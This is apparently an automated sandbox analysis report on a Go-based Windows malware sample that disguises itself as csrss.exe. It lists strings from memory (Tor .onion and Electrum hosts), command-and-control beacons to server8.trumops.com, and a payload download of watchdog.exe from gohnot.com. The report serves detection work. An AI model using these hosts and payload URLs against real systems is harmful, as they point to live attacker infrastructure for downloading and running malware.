Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp String found in binary or memory: the same Go string-table run as quoted for the 00000000 dump above (identical text, omitted here)
Source: csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp String found in binary or memory: the same Go string-table run as quoted for the 00000000 dump above (identical text, omitted here)
Source: csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not 
supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not 
supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not 
supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
HTTP/1.1 200 OK
Date: Thu, 11 Nov 2021 00:57:46 GMT
Content-Type: application/octet-stream
Content-Length: 2102272
Connection: keep-alive
content-disposition: attachment; filename=watchdog.exe
etag: "616ea494-201400"
last-modified: Tue, 19 Oct 2021 10:57:24 GMT
Cache-Control: max-age=3600
CF-Cache-Status: HIT
Age: 3465
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mUdca%2FhPVx%2BcuIN0mD4co%2Fq%2B%2FeXbPU6Zq0S%2FW1p4uyl4SjDH8JZzFzI5IDyMwm0EeLJ8hLsHyRpILoj74RMKgCuPLLbsz17avF1sdGfbIzhrwOIhomElDn412zdD"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 6ac39180d8125c92-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
POST /api/poll HTTP/1.1
Host: server8.trumops.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Length: 652
Accept-Encoding: gzip
Source: global traffic HTTP traffic detected:
POST /api/poll HTTP/1.1
Host: server8.trumops.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0
Content-Length: 668
Accept-Encoding: gzip
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Thu, 11 Nov 2021 00:57:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.11
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bKtxxp476cwRWpL7PMsiOEiUQCqwyb3bZEaJ0AAlC%2FT9jGwQdvS7Se%2BfmHEOErvcAP%2B4zdZUYVGNLmzkEYvbf2eQj3YtbAsdfhB5eIGhFyxOPCEF4oO6j5HX%2FobEjzLNcm0pI2mw"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6ac39101ef046927-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Thu, 11 Nov 2021 00:57:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.11
set-cookie: PHPSESSID=gv8mampiuh95qf18cj0go9m89u; path=/; HttpOnly
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
access-control-allow-credentials: false
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RBPQOW%2BDKJcfajEWjUAp5sEAC%2F%2FnnEUjdXStK%2Byc0Yn65mfutwtYjwiIq%2BUlGvNK0I8GjSutN%2BRWb2fq4knditxLDLYpwlGC1tM5sB3%2F2PrElhih1ODR82MTA1P9qvUN7SYUkd8C"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6ac39121ec73701b-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Thu, 11 Nov 2021 00:58:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.11
set-cookie: PHPSESSID=4ujbsd6crmkskigbel52akbion; path=/; HttpOnly
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
access-control-allow-credentials: false
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ryIHSGUMxFPJ%2F1e4qghNO%2FLH6YHJuD1QQg3lP1u0%2BXF1eYpABsushydm506ZkuU1RkdCCxRbUIoxtS3RvmeD7XMScKD9Nd4FY3%2Bt%2Fz7lrD9OZ3nlNfnYz5B0JVNarhQrNImsp3fS"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6ac392db8b07f407-LHR
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: csrss.exe String found in binary or memory: .30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: received unexpected handshake message of type %T when waiting for %TBlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103Mozilla/5.0 (Windows NT equals www.facebook.com (Facebook)
Source: csrss.exe String found in binary or memory: lla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916260026308143510066 equals www.facebook.com (Facebook)
Source: csrss.exe String found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
Source: csrss.exe String found in binary or memory: http://builtwith.com/biup)
Source: 4t4y4r89UZ.exe, 00000000.00000002.293844995.0000000004C28000.00000040.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.320126645.0000000004BB5000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.553003907.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.364381433.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.393120243.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000022.00000002.387543295.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp String found in binary or memory: http://crl.g
Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.391872989.00000000009F9000.00000040.00020000.sdmp, csrss.exe, 00000022.00000002.380920089.00000000009F9000.00000040.00020000.sdmp String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.391872989.00000000009F9000.00000040.00020000.sdmp, csrss.exe, 00000022.00000002.380920089.00000000009F9000.00000040.00020000.sdmp String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.391872989.00000000009F9000.00000040.00020000.sdmp, csrss.exe, 00000022.00000002.380920089.00000000009F9000.00000040.00020000.sdmp String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
Source: csrss.exe String found in binary or memory: http://gais.cs.ccu.edu.tw/robot.php)Gulper
Source: csrss.exe, 0000000E.00000003.380180308.000000001688A000.00000004.00000001.sdmp String found in binary or memory: http://gohnot.com/61c75dbee3f325b4d87cddaf5bae3393
Source: csrss.exe, 0000000E.00000003.376871175.0000000016B3E000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.378698151.000000001697C000.00000004.00000001.sdmp String found in binary or memory: http://gohnot.com/61c75dbee3f325b4d87cddaf5bae3393/watchdog.exe
Source: csrss.exe String found in binary or memory: http://grub.org)Mozilla/5.0
Source: csrss.exe String found in binary or memory: http://help.ya
Source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp String found in binary or memory: http://https://_bad_pdb_file.pdb
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna:
Source: csrss.exe String found in binary or memory: http://misc.yahoo.com.cn/he
Source: csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp String found in binary or memory: http://newscommer.com/app/app.exe
Source: csrss.exe String found in binary or memory: http://search.msn.com/msnb
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
Source: csrss.exe String found in binary or memory: http://www.alexa.com/help/webmasters;
Source: csrss.exe String found in binary or memory: http://www.archive.org/details/archive.org_bot)Opera/9.80
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
Source: csrss.exe String found in binary or memory: http://www.baidu.com/search/spide
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
Source: svchost.exe, 00000005.00000002.309019102.0000029B1CA13000.00000004.00000001.sdmp String found in binary or memory: http://www.bingmapsportal.comsv
Source: csrss.exe String found in binary or memory: http://www.bloglines.com)F
Source: csrss.exe String found in binary or memory: http://www.everyfeed.c
Source: csrss.exe String found in binary or memory: http://www.exabot.com/go/robot)Opera/9.80
Source: csrss.exe String found in binary or memory: http://www.google.com/adsbot.html)Encountered
Source: csrss.exe String found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
Source: csrss.exe String found in binary or memory: http://www.google.com/bot.html)tls:
Source: csrss.exe String found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
Source: csrss.exe String found in binary or memory: http://www.googlebot.com/bot.html)Links
Source: csrss.exe String found in binary or memory: http://www.spidersoft.com)Wget/1.9
Source: csrss.exe String found in binary or memory: http://yandex.com/bots)Opera/9.51
Source: csrss.exe String found in binary or memory: http://yandex.com/bots)Opera/9.80
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.comr
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: https://blockchain.infoindex
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000005.00000003.307756763.0000029B1CA5E000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000005.00000003.307756763.0000029B1CA5E000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp String found in binary or memory: https://logs.trumops.com
